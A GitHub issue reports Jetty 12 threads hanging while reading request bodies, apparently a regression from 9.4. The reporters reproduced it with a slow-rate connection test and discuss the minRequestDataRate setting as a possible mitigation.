-
Notifications
You must be signed in to change notification settings - Fork 1.9k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Jetty threads stuck on BlockingContentProvider.nextContent #12434
Comments
Do you have a complete project for this? |
Yes, that's happening with one of our services. We are using Jersey 2.43. We did upgrade it from 2.39 when we moved to Jetty 12. |
Jetty version(s)
12.0.13
Jetty Environment
ee8
Java version/vendor
21.0.4.7.1/AWS (Corretto)
OS type/version
Ubuntu/22.04
Description
After migrating our application from Jetty 9.4 to 12, we've encountered an issue with hung Jetty threadpool threads. We're not using virtual threads, and we've ensured no queue limit is set as per the documentation.
The problem manifests as Jetty becoming unresponsive, requiring pod recycling to resolve. While the exact trigger is unknown, it may be related to cloud provider network issues or sudden traffic surges.
Thread dumps from affected instances reveal most threads in a WAITING state on
HttpInput.read()
, specifically blocked onBlockingContentProvider.nextContent()
when attempting to read request bodies. Here is a similar issue.We successfully replicated this state using a "low and slow" DoS attack, establishing connections to the Jetty instance and sending data at an extremely slow rate (1 byte per second). In Jetty 9.4, threads recover once the attack stops, but in Jetty 12, they remain stuck indefinitely, necessitating an application restart. This behavior suggests a potential regression introduced between versions 9.4 and 12.
Our investigation led us to the undocumented minRequestDataRate property. Setting it to 50 prevented the issue in our test environment. However, this configuration may be unreliable due to potential JIT and GC pauses affecting legitimate connections.
While the test environment issue and production problem seem to share an underlying cause, we cannot confirm that the same "low and slow" scenario occurs in production. Consequently, we're uncertain if applying the
minRequestDataRate
setting will resolve the issue in our production environment.We seek guidance on identifying the root cause of this behavior change between Jetty versions and determining an appropriate solution.
Jetty server dump - jetty_dump.txt
An example of a stuck thread (from thread dump):
How to reproduce?
Use “low and slow” DoS attack against a Jetty-based application where the number of concurrent requests >
jetty.threadPool.maxThreads
. Here is a sample Java code:The text was updated successfully, but these errors were encountered: